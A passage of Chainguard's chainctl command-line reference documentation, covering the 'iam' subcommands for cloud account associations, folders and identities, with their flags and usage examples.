(default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam folders - IAM folders interactions. chainctl iam identities - Identity management. chainctl iam identity-providers - customer managed identity provider management chainctl iam invites - Manage invite codes that register identities with Chainguard. chainctl iam organizations - IAM organization interactions. chainctl iam role-bindings - IAM role-bindings resource interactions. chainctl iam roles - IAM role resource interactions. --- ### chainctl iam account-associations URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations Configure and manage cloud provider account associations. Options -h, --help help for account-associations Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. chainctl iam account-associations describe - Describe cloud provider account associations for a location. chainctl iam account-associations set - Set cloud provider account associations for a location. chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam account-associations check URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check Check the OIDC federation configurations for cloud providers. Options -h, --help help for check Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. 
--issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations check aws - Checks that the given location has been properly configured for OIDC federation with AWS chainctl iam account-associations check gcp - Checks that the given location has been properly configured for OIDC federation with GCP --- ### chainctl iam account-associations check aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check aws Checks that the given location has been properly configured for OIDC federation with AWS chainctl iam account-associations check aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [flags] Options -h, --help help for aws Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. --- ### chainctl iam account-associations check gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_check_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations check gcp Checks that the given location has been properly configured for OIDC federation with GCP chainctl iam account-associations check gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [flags] Options -h, --help help for gcp Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. 
SEE ALSO chainctl iam account-associations check - Check the OIDC federation configurations for cloud providers. --- ### chainctl iam account-associations describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations describe Describe cloud provider account associations for a location. chainctl iam account-associations describe ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--aws] [--gcp] [--chainguard] [--output=id|json|table] [flags] Options --aws Include the AWS account association. --chainguard Include the Chainguard service principal account association. --gcp Include the GCP account association. -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. --- ### chainctl iam account-associations set URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set Set cloud provider account associations for a location. Options -h, --help help for set Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations set aws - Set AWS account association for a location. chainctl iam account-associations set gcp - Set GCP account association for a location. --- ### chainctl iam account-associations set aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set aws Set AWS account association for a location. 
chainctl iam account-associations set aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID --account=ACCOUNT [--name=NAME] [--description=DESCRIPTION] [--yes] [--output=id|json|table] [flags] Options --account string The AWS account ID. -d, --description string The description of the resource. -h, --help help for aws -n, --name string Given name of the resource. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations set - Set cloud provider account associations for a location. --- ### chainctl iam account-associations set gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_set_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations set gcp Set GCP account association for a location. chainctl iam account-associations set gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID --project-id=PROJECT_ID --project-number=PROJECT_NUMBER [--name=NAME] [--description=DESCRIPTION] [--yes] [--output=id|json|table] [flags] Options -d, --description string The description of the resource. -h, --help help for gcp -n, --name string Given name of the resource. --project-id string The GCP project ID. --project-number string The GCP project number. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations set - Set cloud provider account associations for a location. --- ### chainctl iam account-associations unset URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset Remove cloud provider account associations from a location. 
Options -h, --help help for unset Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations - Configure and manage cloud provider account associations. chainctl iam account-associations unset aws - Remove AWS account configuration for a location. chainctl iam account-associations unset gcp - Remove GCP account configuration for a location. --- ### chainctl iam account-associations unset aws URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset_aws/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset aws Remove AWS account configuration for a location. chainctl iam account-associations unset aws ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--yes] [flags] Options -h, --help help for aws -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam account-associations unset gcp URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_account-associations_unset_gcp/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam account-associations unset gcp Remove GCP account configuration for a location. chainctl iam account-associations unset gcp ORGANIZATION_NAME|ORGANIZATION_ID|FOLDER_NAME|FOLDER_ID [--yes] [flags] Options -h, --help help for gcp -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. 
Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam account-associations unset - Remove cloud provider account associations from a location. --- ### chainctl iam folders URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders IAM folders interactions. Options -h, --help help for folders Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam folders delete - Delete a folder. chainctl iam folders describe - Describe a folder. chainctl iam folders list - List folders under an organization. chainctl iam folders update - Update a folder. --- ### chainctl iam folders delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders delete Delete a folder. chainctl iam folders delete [FOLDER_NAME | FOLDER_ID] [--skip-refresh] [--yes] Examples # Delete a folder by ID chainctl iam folders delete 19d3a64f20c64ba3ccf1bc86ce59d03e705959ad/efb53f2857d567f2 # Delete a folder by name chainctl iam folders delete my-folder # Delete a folder to be selected interactively chainctl iam folders delete Options -h, --help help for delete --skip-refresh Skips attempting to reauthenticate and refresh the Chainguard auth token if it becomes out of date. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. 
(default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders describe Describe a folder. chainctl iam folders describe [FOLDER_NAME | FOLDER_ID] [--active-within=DURATION] [--output=json] Options --active-within duration How recently a record must have been active to be listed. Zero will return all records. (default 24h0m0s) -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders list List folders under an organization. chainctl iam folders list ORGANIZATION_NAME | ORGANIZATION_ID [--output=id|json|table|tree] Options -h, --help help for list Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam folders update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_folders_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam folders update Update a folder. 
chainctl iam folders update FOLDER_NAME | FOLDER_ID [--name FOLDER_NAME] [--description FOLDER_DESCRIPTION] Examples # Update a folder's name chainctl iam folders update my-folder --name new-folder-name # Update a folder's description chainctl iam folders update 19d3a64f20c64ba3ccf1bc86ce59d03e705959ad/efb53f2857d567f2 --description "A description of the folder." # Remove a folder's description chainctl iam folders update my-folder --description "" Options -d, --description string The updated description for the folder. -h, --help help for update -n, --name string The updated name for the folder. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam folders - IAM folders interactions. --- ### chainctl iam identities URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities Identity management. Options -h, --help help for identities Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam identities create - Create a new identity. chainctl iam identities delete - Delete one or more identities. chainctl iam identities describe - View the details of an identity. chainctl iam identities list - List identities. chainctl iam identities update - Update an identity --- ### chainctl iam identities create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create Create a new identity. chainctl iam identities create NAME {--filename FILE | {--identity-issuer=ISS | --identity-issuer-pattern=PAT} {--subject=SUB | --subject-pattern=PAT} [--audience=AUD | --audience-pattern=PAT] [--claim-pattern=claim:pattern,claim:pattern...] 
| --identity-issuer=ISS --issuer-keys=KEYS --subject=SUB [--expiration=yyyy-mm-dd]} [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] [--output=id|json|table] Examples # Create a static identity using the default expiration. chainctl iam identities create my-identity --identity-issuer=https://issuer.mycompany.com --issuer-keys=deadbeef --subject=1234 # Create an identity with literal values to match from claims. chainctl iam identities create my-identity --identity-issuer=https://issuer.mycompany.com --subject=1234 # Create an identity using patterns to match claims chainctl iam identities create my-identity --identity-issuer-pattern="https://*.mycompany\.com" --subject-pattern="^\d{4}$" # Create an identity from a JSON file definition and bind to a role chainctl iam identities create my-identity -f path/to/identity-definition.json --role=viewer Options --audience string The audience of the identity (optional). --audience-pattern string A pattern to match the audience of the identity (optional). --claim-pattern stringArray A comma-separated list of claim:pattern pairs of custom claims to match for this identity (optional). -d, --description string The description of the resource. --expiration string The time when the issuer_keys will expire. Defaults to / Maximum of 30 days after creation time (yyyy-mm-dd). -f, --filename string A file that contains the identity definition, in either YAML or JSON. -h, --help help for create --identity-issuer string The issuer of the identity. --identity-issuer-pattern string A pattern to match the issuer of the identity. --issuer-keys string JWKS-formatted public keys for the issuer. -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --role strings A comma separated list of names or IDs of roles to bind this identity to (optional). --service-principal string The service principal that is allowed to assume this identity. --subject string The subject of the identity. --subject-pattern string A pattern to match the subject of the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. chainctl iam identities create github - chainctl iam identities create gitlab - --- ### chainctl iam identities create github URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create_github/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create github chainctl iam identities create github NAME --github-repo=REPO [--github-ref=REF] [--github-audience=AUD] [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] 
[--output=id|json|table] Examples # Create a GitHub Actions identity for any branch in a repo chainctl iam identities create github my-gha-identity --github-repo=my-org/repo-name --parent=eng-org # Create a GitHub Actions identity for a given branch in a repo and bind to a role chainctl iam identities create github my-gha-identity --github-repo=my-org/repo-name --github-ref=refs/heads/test-branch --role=owner Options -d, --description string The description of the resource. --github-audience string The audience for the GitHub OIDC token --github-ref string The branch reference for the executing action (optional). --github-repo string The name of a GitHub repo where the action executes. -h, --help help for github -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --role strings A comma separated list of names or IDs of roles to bind this identity to (optional). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities create - Create a new identity. --- ### chainctl iam identities create gitlab URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_create_gitlab/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities create gitlab chainctl iam identities create gitlab NAME --project-path=GITLAB-GROUP/GITLAB-PROJECT --ref-type={tag|branch} [--ref=REF] [--parent=PARENT] [--description=DESC] [--role=ROLE,ROLE,...] [--output=id|json|table] Examples # Create a Gitlab CI identity for any branch in a given Gitlab project chainctl iam identities create gitlab my-gitlab-identity --project-path=my-group/my-project --ref-type=branch --parent=eng-org # Create a Gitlab CI identity for a given branch in a Gitlab project and bind to a role chainctl iam identities create gitlab my-gitlab-identity --project-path=my-group/my-project --ref-type=branch --ref=main --role=owner Options -d, --description string The description of the resource. -h, --help help for gitlab -n, --name string Given name of the resource. --parent string The name or id of the parent location to create this identity under. --project-path string The name of a Gitlab project where the action executes in the form "group-name/project-name[/foo/bar]". You can use a "*" for project-name (or sub-projects) to match any project in the group. --ref string The reference for the executing action. If left empty or "*", all references will match. --ref-type string The type of reference for the executing action, must be either "tag" or "branch". 
--role strings A comma separated list of names or IDs of roles to bind this identity to (optional). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities create - Create a new identity. --- ### chainctl iam identities delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities delete Delete one or more identities. chainctl iam identities delete {IDENTITY_NAME | IDENTITY_ID | --expired [--parent=PARENT]} [--yes] Examples # Delete an identity by name chainctl iam identities delete my-identity # Delete all expired static identities in an organization chainctl iam identities delete --expired --parent=my-org Options --expired Delete all expired identities. -h, --help help for delete --parent string Name or ID of the parent location to delete expired identities from. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities describe View the details of an identity. chainctl iam identities describe {IDENTITY_NAME | IDENTITY_ID} [flags] Options -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. 
Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities list List identities. chainctl iam identities list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--name=NAME] [--relationship={aws|claim_match|pull_token|service_principal|static}] [--expired] [--output=id|json|table] Examples # List all identities. chainctl iam identities list # List all static identities. chainctl iam identities list --relationship=static # Filter identities by name. chainctl iam identities list --name=my-identity # List expired identities chainctl iam identities list --expired Options --expired Return only expired static identities. -h, --help help for list --name string Filter identities by name. --parent string The name or id of the parent location to list identities from. --relationship string Filter identities by relationship type (aws, claim_match, pull_token, service_principal, static). Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identities update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identities_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identities update Update an identity chainctl iam identities update IDENTITY_NAME | IDENTITY_ID [--description=DESC] [--identity-issuer=ISS | --identity-issuer-pattern=PAT] [--subject=SUB | --subject-pattern=PAT] [--audience=AUD | --audience-pattern=PAT] [--claim-pattern=claim:pattern,claim:pattern...] [--issuer-keys=KEYS] [--expiration=yyyy-mm-dd] [--output=id|json|table] [flags] Examples # Update the issuer of an identity. chainctl iam identities update my-identity --identity-issuer=https://new-issuer.mycompany.com # Update the subject to a pattern and update the audience of an identity. chainctl iam identities update my-identity 